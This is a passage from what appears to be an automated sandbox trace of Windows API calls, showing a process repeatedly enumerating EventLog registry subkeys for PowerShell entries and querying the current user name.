	[0785.743] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x32c) returned 0x0
	[0785.743] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.743] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x330) returned 0x0
	[0785.743] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.743] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x334) returned 0x0
	[0785.743] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.744] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x338) returned 0x0
	[0785.744] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.744] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x33c) returned 0x0
	[0785.744] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.749] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x340) returned 0x0
	[0785.749] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.749] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x344) returned 0x0
	[0785.749] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.750] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x348) returned 0x0
	[0785.750] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x0) returned 0x2
	[0785.750] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x34c) returned 0x0
	[0785.750] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6d8 | out: phkResult=0x1cd6d8*=0x350) returned 0x0
	[0785.750] RegCloseKey (hKey=0x350) returned 0x0
	[0785.750] RegCloseKey (hKey=0x320) returned 0x0
	[0785.752] RegCloseKey (hKey=0x34c) returned 0x0
	[0785.760] CoTaskMemAlloc (cb=0x804) returned 0x289e0f0
	[0785.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x289e0f0, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0785.763] CoTaskMemFree (pv=0x289e0f0) 
	[0785.764] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0785.764] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0785.764] CoTaskMemFree (pv=0x371d50) 
	[0786.718] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd628 | out: phkResult=0x1cd628*=0x354) returned 0x0
	[0786.718] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.718] CoTaskMemFree (pv=0x0) 
	[0786.718] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.718] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.718] CoTaskMemFree (pv=0x371d50) 
	[0786.718] CoTaskMemFree (pv=0x0) 
	[0786.718] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.718] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.718] CoTaskMemFree (pv=0x371d50) 
	[0786.718] CoTaskMemFree (pv=0x0) 
	[0786.719] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.719] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.719] CoTaskMemFree (pv=0x371d50) 
	[0786.719] CoTaskMemFree (pv=0x0) 
	[0786.719] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.719] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.719] CoTaskMemFree (pv=0x371d50) 
	[0786.719] CoTaskMemFree (pv=0x0) 
	[0786.719] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.719] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.719] CoTaskMemFree (pv=0x371d50) 
	[0786.719] CoTaskMemFree (pv=0x0) 
	[0786.719] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.719] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.719] CoTaskMemFree (pv=0x371d50) 
	[0786.720] CoTaskMemFree (pv=0x0) 
	[0786.720] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.720] CoTaskMemFree (pv=0x371d50) 
	[0786.720] CoTaskMemFree (pv=0x0) 
	[0786.720] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.720] CoTaskMemFree (pv=0x371d50) 
	[0786.720] CoTaskMemFree (pv=0x0) 
	[0786.720] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.720] CoTaskMemFree (pv=0x371d50) 
	[0786.720] CoTaskMemFree (pv=0x0) 
	[0786.720] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x358) returned 0x0
	[0786.721] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.721] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x35c) returned 0x0
	[0786.721] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.721] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x360) returned 0x0
	[0786.721] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.721] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x364) returned 0x0
	[0786.722] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x368) returned 0x0
	[0786.722] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x36c) returned 0x0
	[0786.722] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x370) returned 0x0
	[0786.722] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x374) returned 0x0
	[0786.723] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.723] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x378) returned 0x0
	[0786.725] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x37c) returned 0x0
	[0786.725] RegCloseKey (hKey=0x37c) returned 0x0
	[0786.725] RegCloseKey (hKey=0x354) returned 0x0
	[0786.726] RegCloseKey (hKey=0x378) returned 0x0
	[0786.726] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd628 | out: phkResult=0x1cd628*=0x378) returned 0x0
	[0786.727] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.727] CoTaskMemFree (pv=0x0) 
	[0786.727] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.727] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.727] CoTaskMemFree (pv=0x371d50) 
	[0786.727] CoTaskMemFree (pv=0x0) 
	[0786.727] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.727] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.727] CoTaskMemFree (pv=0x371d50) 
	[0786.727] CoTaskMemFree (pv=0x0) 
	[0786.727] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.727] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.727] CoTaskMemFree (pv=0x371d50) 
	[0786.727] CoTaskMemFree (pv=0x0) 
	[0786.727] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.727] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.728] CoTaskMemFree (pv=0x371d50) 
	[0786.728] CoTaskMemFree (pv=0x0) 
	[0786.728] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.728] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.728] CoTaskMemFree (pv=0x371d50) 
	[0786.728] CoTaskMemFree (pv=0x0) 
	[0786.728] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.728] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.728] CoTaskMemFree (pv=0x371d50) 
	[0786.728] CoTaskMemFree (pv=0x0) 
	[0786.728] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.728] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.728] CoTaskMemFree (pv=0x371d50) 
	[0786.728] CoTaskMemFree (pv=0x0) 
	[0786.728] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.729] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.729] CoTaskMemFree (pv=0x371d50) 
	[0786.729] CoTaskMemFree (pv=0x0) 
	[0786.729] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.729] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x371d50, lpcchName=0x1cd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.729] CoTaskMemFree (pv=0x371d50) 
	[0786.729] CoTaskMemFree (pv=0x0) 
	[0786.729] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x354) returned 0x0
	[0786.729] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.729] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x37c) returned 0x0
	[0786.730] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.730] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x380) returned 0x0
	[0786.730] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.730] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x384) returned 0x0
	[0786.730] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.730] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x388) returned 0x0
	[0786.730] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.731] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x38c) returned 0x0
	[0786.731] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.731] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x390) returned 0x0
	[0786.731] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.731] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x394) returned 0x0
	[0786.731] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x0) returned 0x2
	[0786.731] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x398) returned 0x0
	[0786.732] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x39c) returned 0x0
	[0786.732] RegCloseKey (hKey=0x39c) returned 0x0
	[0786.732] RegCloseKey (hKey=0x378) returned 0x0
	[0786.732] RegCloseKey (hKey=0x398) returned 0x0
	[0786.733] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5f8 | out: phkResult=0x1cd5f8*=0x398) returned 0x0
	[0786.733] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.734] CoTaskMemFree (pv=0x0) 
	[0786.734] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.734] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.734] CoTaskMemFree (pv=0x371d50) 
	[0786.734] CoTaskMemFree (pv=0x0) 
	[0786.734] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.734] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.734] CoTaskMemFree (pv=0x371d50) 
	[0786.734] CoTaskMemFree (pv=0x0) 
	[0786.734] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.734] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.734] CoTaskMemFree (pv=0x371d50) 
	[0786.734] CoTaskMemFree (pv=0x0) 
	[0786.734] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.734] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.735] CoTaskMemFree (pv=0x371d50) 
	[0786.735] CoTaskMemFree (pv=0x0) 
	[0786.735] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.735] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.735] CoTaskMemFree (pv=0x371d50) 
	[0786.735] CoTaskMemFree (pv=0x0) 
	[0786.735] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.735] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.735] CoTaskMemFree (pv=0x371d50) 
	[0786.735] CoTaskMemFree (pv=0x0) 
	[0786.735] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.735] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.735] CoTaskMemFree (pv=0x371d50) 
	[0786.736] CoTaskMemFree (pv=0x0) 
	[0786.736] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.736] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.736] CoTaskMemFree (pv=0x371d50) 
	[0786.736] CoTaskMemFree (pv=0x0) 
	[0786.736] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0786.736] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x371d50, lpcchName=0x1cd5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.736] CoTaskMemFree (pv=0x371d50) 
	[0786.736] CoTaskMemFree (pv=0x0) 
	[0786.736] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x378) returned 0x0
	[0786.736] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
